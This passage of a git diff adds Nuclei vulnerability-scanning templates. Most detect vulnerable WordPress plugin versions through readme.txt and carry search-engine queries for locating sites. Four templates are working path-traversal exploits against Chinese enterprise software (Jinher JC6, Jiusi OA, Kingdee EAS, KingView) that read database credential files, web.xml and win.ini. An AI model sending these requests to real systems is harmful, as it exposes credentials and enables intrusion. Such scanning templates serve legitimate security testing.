+id: fluentform-73d12813260178303738b5378f138bfb + +info: + name: > + Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder <= 5.2.6 - Unauthenticated Stored Cross-Site Scripting via Form Subject + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/41c2ec31-360d-4145-b0b4-77d4d1d4b8a1?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/fluentform/" + google-query: inurl:"/wp-content/plugins/fluentform/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,fluentform,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/fluentform/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fluentform" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.2.6') \ No newline at end of file diff --git a/poc/other/full-screen-page-background-image-slideshow.yaml b/poc/other/full-screen-page-background-image-slideshow.yaml new file mode 100644 index 0000000000..45377647ba --- /dev/null +++ b/poc/other/full-screen-page-background-image-slideshow.yaml @@ -0,0 +1,59 @@ +id: full-screen-page-background-image-slideshow-6def5bf7385a589549cc6977b19eb2ae + +info: + name: > + Full Screen (Page) Background Image Slideshow <= 1.1 Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/bf2ffdb1-fe10-475b-9c05-553a95d7b3bc?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/full-screen-page-background-image-slideshow/" + google-query: inurl:"/wp-content/plugins/full-screen-page-background-image-slideshow/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,full-screen-page-background-image-slideshow,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/full-screen-page-background-image-slideshow/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "full-screen-page-background-image-slideshow" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1') \ No newline at end of file diff --git a/poc/other/ganohrs-toggle-shortcode-9c361274065595fa7c1b34cfc52539a1.yaml b/poc/other/ganohrs-toggle-shortcode-9c361274065595fa7c1b34cfc52539a1.yaml new file mode 100644 index 0000000000..8c3838e0fb --- /dev/null +++ b/poc/other/ganohrs-toggle-shortcode-9c361274065595fa7c1b34cfc52539a1.yaml @@ -0,0 +1,59 @@ +id: ganohrs-toggle-shortcode-9c361274065595fa7c1b34cfc52539a1 + +info: + name: > + Ganohrs Toggle Shortcode <= 0.2.4 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/efd49905-0f2c-44b7-85c6-c2b77440ac17?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/ganohrs-toggle-shortcode/" + google-query: inurl:"/wp-content/plugins/ganohrs-toggle-shortcode/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,ganohrs-toggle-shortcode,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ganohrs-toggle-shortcode/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ganohrs-toggle-shortcode" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.2.4') \ No newline at end of file diff --git a/poc/other/get-post-content-shortcode-b22e11dd16a8eba4c44d1ec8159b3556.yaml b/poc/other/get-post-content-shortcode-b22e11dd16a8eba4c44d1ec8159b3556.yaml new file mode 100644 index 0000000000..85250bf3b3 --- /dev/null +++ b/poc/other/get-post-content-shortcode-b22e11dd16a8eba4c44d1ec8159b3556.yaml @@ -0,0 +1,59 @@ +id: get-post-content-shortcode-b22e11dd16a8eba4c44d1ec8159b3556 + +info: + name: > + Get Post Content Shortcode <= 0.4 - Insecure Direct Object Reference to Authenticated (Contributor+) Sensitive Information Disclosure via post_content Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c2b92091-e615-484f-b402-2e793eed214d?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/get-post-content-shortcode/" + google-query: inurl:"/wp-content/plugins/get-post-content-shortcode/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,get-post-content-shortcode,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/get-post-content-shortcode/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "get-post-content-shortcode" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.4') \ No newline at end of file diff --git a/poc/other/glomex-oembed-2234b2001bef09d3310372cf737d335d.yaml b/poc/other/glomex-oembed-2234b2001bef09d3310372cf737d335d.yaml new file mode 100644 index 0000000000..d003b0787a --- /dev/null +++ b/poc/other/glomex-oembed-2234b2001bef09d3310372cf737d335d.yaml @@ -0,0 +1,59 @@ +id: glomex-oembed-2234b2001bef09d3310372cf737d335d + +info: + name: > + glomex oEmbed <= 0.9.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0e57cf85-eec0-4cf6-a800-ceb2b46e2bcd?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/glomex-oembed/" + google-query: inurl:"/wp-content/plugins/glomex-oembed/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,glomex-oembed,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/glomex-oembed/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "glomex-oembed" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.9.1') \ No newline at end of file diff --git a/poc/other/gmw-premium-settings.yaml b/poc/other/gmw-premium-settings.yaml new file mode 100644 index 0000000000..32f268b45b --- /dev/null +++ b/poc/other/gmw-premium-settings.yaml @@ -0,0 +1,59 @@ +id: gmw-premium-settings-dd2bed6814a3bf62f3d77a7f20807d63 + +info: + name: > + GEO My WordPress <= 4.4.0.2 - Authenticated (Admin+) Arbitrary File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e8214cdd-3a7d-40ce-9645-7dbd6e8f037f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/gmw-premium-settings/" + google-query: inurl:"/wp-content/plugins/gmw-premium-settings/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,gmw-premium-settings,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/gmw-premium-settings/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "gmw-premium-settings" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 3.1') \ No newline at end of file diff --git a/poc/other/hello-in-all-languages.yaml b/poc/other/hello-in-all-languages.yaml new file mode 100644 index 0000000000..dc0ecc00d4 --- /dev/null +++ b/poc/other/hello-in-all-languages.yaml @@ -0,0 +1,59 @@ +id: hello-in-all-languages-b021d6b8c28aeac89d4ee418f75211e9 + +info: + name: > + Hello in All Languages <= 1.0.6 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/85501fc0-5d51-492b-b208-4b84f371ee77?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/hello-in-all-languages/" + google-query: inurl:"/wp-content/plugins/hello-in-all-languages/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,hello-in-all-languages,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/hello-in-all-languages/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "hello-in-all-languages" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.6') \ No newline at end of file diff --git a/poc/other/hits-counter.yaml b/poc/other/hits-counter.yaml new file mode 100644 index 0000000000..1b20d102c0 --- /dev/null +++ b/poc/other/hits-counter.yaml @@ -0,0 +1,59 @@ +id: hits-counter-cc939d1b6fabefd87c8b2ff2ea159694 + +info: + name: > + Post Hits Counter <= 2.8.23 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/746bf178-5e1b-4f1a-8072-d0c1be005f88?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/hits-counter/" + google-query: inurl:"/wp-content/plugins/hits-counter/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,hits-counter,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/hits-counter/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "hits-counter" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.23') \ No newline at end of file diff --git a/poc/other/import-eventbrite-events-fbff3ca801016ea3ccdd49c17eb80e43.yaml b/poc/other/import-eventbrite-events-fbff3ca801016ea3ccdd49c17eb80e43.yaml new file mode 100644 index 0000000000..9ec272a196 --- /dev/null +++ b/poc/other/import-eventbrite-events-fbff3ca801016ea3ccdd49c17eb80e43.yaml @@ -0,0 +1,59 @@ +id: import-eventbrite-events-fbff3ca801016ea3ccdd49c17eb80e43 + +info: + name: > + Import Eventbrite Events <= 1.7.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f799db97-ca61-439d-94ec-a44270d1cd07?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/import-eventbrite-events/" + google-query: inurl:"/wp-content/plugins/import-eventbrite-events/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,import-eventbrite-events,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/import-eventbrite-events/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "import-eventbrite-events" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.7.4') \ No newline at end of file diff --git a/poc/other/jinher-JC6-oaplusrangedownloadfile-filedownload.yaml b/poc/other/jinher-JC6-oaplusrangedownloadfile-filedownload.yaml new file mode 100644 index 0000000000..c15d99f4e4 --- /dev/null +++ b/poc/other/jinher-JC6-oaplusrangedownloadfile-filedownload.yaml @@ -0,0 +1,19 @@ +id: jinher-JC6-oaplusrangedownloadfile-filedownload + +info: + name: jinher-JC6-oaplusrangedownloadfile-filedownload + author: PokerSec + severity: high + metadata: + fofasearch: body="/jc6/platform/" + +http: + - raw: + - | + GET /jc6/JHSoft.WCF/login/oaplusrangedownloadfile?filename=../WEB-INF/classes/db.properties HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - status_code==200 && contains_all(body,"jc6.config") && contains_all(body,"jdbc.password") \ No newline at end of file diff --git a/poc/other/jiusi-oa-dl-fileread.yaml b/poc/other/jiusi-oa-dl-fileread.yaml new file mode 100644 index 0000000000..7547e00164 --- /dev/null +++ b/poc/other/jiusi-oa-dl-fileread.yaml @@ -0,0 +1,19 @@ +id: jiusi-oa-dl-fileread + +info: + name: jiusi-oa-dl-fileread + author: PokerSec + severity: critical + metadata: + fofasearch: body="/jsoa/login.jsp" + +http: + - raw: + - | + POST /jsoa/dl.jsp?JkZpbGVOYW1lPS4uLy4uLy4uL1dFQi1JTkYvd2ViLnhtbCZwYXRoPS9h HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - status_code==200 && contains_all(body,"web-resource-collection") && contains_all(body,"com.js.oa.") \ No newline at end of file diff --git a/poc/other/jquery-manager.yaml b/poc/other/jquery-manager.yaml new file mode 100644 index 0000000000..d954dba992 --- /dev/null +++ b/poc/other/jquery-manager.yaml @@ -0,0 +1,59 @@ +id: jquery-manager-3367ea01f2088951cb342fb251d528dc + +info: + name: > + jQuery Manager for WordPress <= 1.10.4 - Running Vulnerable Dependency + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/21a27a8b-f599-42b9-9439-4456995dd3fe?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/jquery-manager/" + google-query: inurl:"/wp-content/plugins/jquery-manager/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,jquery-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/jquery-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "jquery-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.10.4') \ No newline at end of file diff --git a/poc/other/kingdee_eas_pdfViewLocal_fileread.yaml b/poc/other/kingdee_eas_pdfViewLocal_fileread.yaml new file mode 100644 index 0000000000..028875a89e --- /dev/null +++ b/poc/other/kingdee_eas_pdfViewLocal_fileread.yaml @@ -0,0 +1,19 @@ +id: kingdee_eas_pdfViewLocal_fileread + +info: + name: kingdee_eas_pdfViewLocal_fileread + author: PokerSec + severity: high + metadata: + fofasearch: header="Apusic Application" + +http: + - raw: + - | + GET /easweb/logout/../cp/dm/pdfViewLocal.jsp?path=../config/bosconfig.xml HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - status_code==200 && contains_all(body,"xml","cacheLazyLoad") \ No newline at end of file diff --git a/poc/other/kingview-KingPortal-img-fileread.yaml b/poc/other/kingview-KingPortal-img-fileread.yaml new file mode 100644 index 0000000000..303ab1cb6f --- /dev/null +++ b/poc/other/kingview-KingPortal-img-fileread.yaml @@ -0,0 +1,19 @@ +id: kingview-KingPortal-img-fileread + +info: + name: kingview-KingPortal-img-fileread + author: PokerSec + severity: high + metadata: + fofasearch: body="/public/javascripts/Common/Util/km_util.js" + +http: + - raw: + - | + GET /kingclient/img?imgPath=..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - status_code==200 && contains_all(body,"[extensions]") && contains_all(body,"[files]") \ No newline at end of file diff --git a/poc/other/koalendar-free-booking-widget-ce4441524b592e785043e6070388f53a.yaml b/poc/other/koalendar-free-booking-widget-ce4441524b592e785043e6070388f53a.yaml new file mode 100644 index 0000000000..ed560a523c --- /dev/null +++ b/poc/other/koalendar-free-booking-widget-ce4441524b592e785043e6070388f53a.yaml @@ -0,0 +1,59 @@ +id: koalendar-free-booking-widget-ce4441524b592e785043e6070388f53a + +info: + name: > + Koalendar – Events & Appointments Booking Calendar <= 1.0.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via height Parameter + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cbbbf5fe-0369-4de6-9b2f-957286b6f394?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/koalendar-free-booking-widget/" + google-query: inurl:"/wp-content/plugins/koalendar-free-booking-widget/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,koalendar-free-booking-widget,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/koalendar-free-booking-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "koalendar-free-booking-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.2') \ No newline at end of file diff --git a/poc/other/kredeum-nfts-63e1fa011074b96657eb8fc01827c46b.yaml b/poc/other/kredeum-nfts-63e1fa011074b96657eb8fc01827c46b.yaml new file mode 100644 index 0000000000..0c284091fc --- /dev/null +++ b/poc/other/kredeum-nfts-63e1fa011074b96657eb8fc01827c46b.yaml @@ -0,0 +1,59 @@ +id: kredeum-nfts-63e1fa011074b96657eb8fc01827c46b + +info: + name: > + Kredeum NFTs, the easiest way to sell your NFTs directly on your WordPress site <= 1.6.9 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3eb74ac2-ac5d-477b-8142-3e42953f859b?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/kredeum-nfts/" + google-query: inurl:"/wp-content/plugins/kredeum-nfts/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,kredeum-nfts,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/kredeum-nfts/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "kredeum-nfts" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.6.9') \ No newline at end of file diff --git a/poc/other/logs-de-connexion.yaml b/poc/other/logs-de-connexion.yaml new file mode 100644 index 0000000000..b0e71d6350 --- /dev/null +++ b/poc/other/logs-de-connexion.yaml @@ -0,0 +1,59 @@ +id: logs-de-connexion-d7d23b155dfaa3a988d72e6127ed152e + +info: + name: > + Connexion Logs <= 3.0.2 - Cross-Site Request Forgery to Log Deletion + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ef0abec6-7d4b-4a1f-8116-e31d60bc34b0?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/logs-de-connexion/" + google-query: inurl:"/wp-content/plugins/logs-de-connexion/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,logs-de-connexion,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/logs-de-connexion/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "logs-de-connexion" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.0.2') \ No newline at end of file diff --git a/poc/other/newsmanapp.yaml b/poc/other/newsmanapp.yaml new file mode 100644 index 0000000000..db5921cee1 --- /dev/null +++ b/poc/other/newsmanapp.yaml @@ -0,0 +1,59 @@ +id: newsmanapp-2cdae8c089e4c36f52b2db17fb262dfa + +info: + name: > + NewsmanApp <= 2.7.6 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/22a02e75-4ab1-48fb-b618-b1dff2fcd97f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/newsmanapp/" + google-query: inurl:"/wp-content/plugins/newsmanapp/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,newsmanapp,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/newsmanapp/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "newsmanapp" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.6') \ No newline at end of file diff --git a/poc/other/newspack-plugin.yaml b/poc/other/newspack-plugin.yaml new file mode 100644 index 0000000000..1dff3e2501 --- /dev/null +++ b/poc/other/newspack-plugin.yaml @@ -0,0 +1,59 @@ +id: newspack-plugin-9379b5458873ca8a838af45b061cf132 + +info: + name: > + Newspack <= 3.8.6 - Missing Authorization + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f68e6fed-1986-4172-8270-0460450d6a02?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/newspack-plugin/" + google-query: inurl:"/wp-content/plugins/newspack-plugin/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,newspack-plugin,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/newspack-plugin/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "newspack-plugin" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.8.6') \ No newline at end of file diff --git a/poc/other/notibar.yaml b/poc/other/notibar.yaml new file mode 100644 index 0000000000..8331534d31 --- /dev/null +++ b/poc/other/notibar.yaml @@ -0,0 +1,59 @@ +id: notibar-6a67eeac174695863f49cd0d3c96e4de + +info: + name: > + Notibar – Notification Bar for WordPress <= 2.1.4 - Authenticated (Subscriber+) Arbitrary Shortcode Execution via njt_nofi_text + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1766727d-ba54-4b46-b362-415c14be027d?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/notibar/" + google-query: inurl:"/wp-content/plugins/notibar/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,notibar,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/notibar/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "notibar" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.4') \ No newline at end of file diff --git a/poc/other/ootb-openstreetmap.yaml b/poc/other/ootb-openstreetmap.yaml new file mode 100644 index 0000000000..22436f4a00 --- /dev/null +++ b/poc/other/ootb-openstreetmap.yaml @@ -0,0 +1,59 @@ +id: ootb-openstreetmap-ebbdd7982d7cfbc5d8fdcc7fb1338a5e + +info: + name: > + Out of the Block: OpenStreetMap <= 2.8.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via ootb_query Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c67c958e-1ab2-498c-b665-73e239d0029b?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/ootb-openstreetmap/" + google-query: inurl:"/wp-content/plugins/ootb-openstreetmap/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,ootb-openstreetmap,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ootb-openstreetmap/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ootb-openstreetmap" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.3') \ No newline at end of file diff --git a/poc/other/planning-center-online-giving.yaml b/poc/other/planning-center-online-giving.yaml new file mode 100644 index 0000000000..fdb576d9a7 --- /dev/null +++ b/poc/other/planning-center-online-giving.yaml @@ -0,0 +1,59 @@ +id: planning-center-online-giving-2b8dc9f317fc89f600c6ff394da3f60b + +info: + name: > + Planning Center Online Giving <= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/bb991940-b4ed-4b64-be59-afe37eaf3a2c?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/planning-center-online-giving/" + google-query: inurl:"/wp-content/plugins/planning-center-online-giving/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,planning-center-online-giving,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/planning-center-online-giving/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "planning-center-online-giving" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/other/plezi-4a635b36fc2f020e6e97470ee9033e55.yaml b/poc/other/plezi-4a635b36fc2f020e6e97470ee9033e55.yaml new file mode 100644 index 0000000000..988efc2ac4 --- /dev/null +++ b/poc/other/plezi-4a635b36fc2f020e6e97470ee9033e55.yaml @@ -0,0 +1,59 @@ +id: plezi-4a635b36fc2f020e6e97470ee9033e55 + +info: + name: > + Plezi <= 1.0.6 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/67768957-45be-48d9-ad5e-147290ef4cd5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: 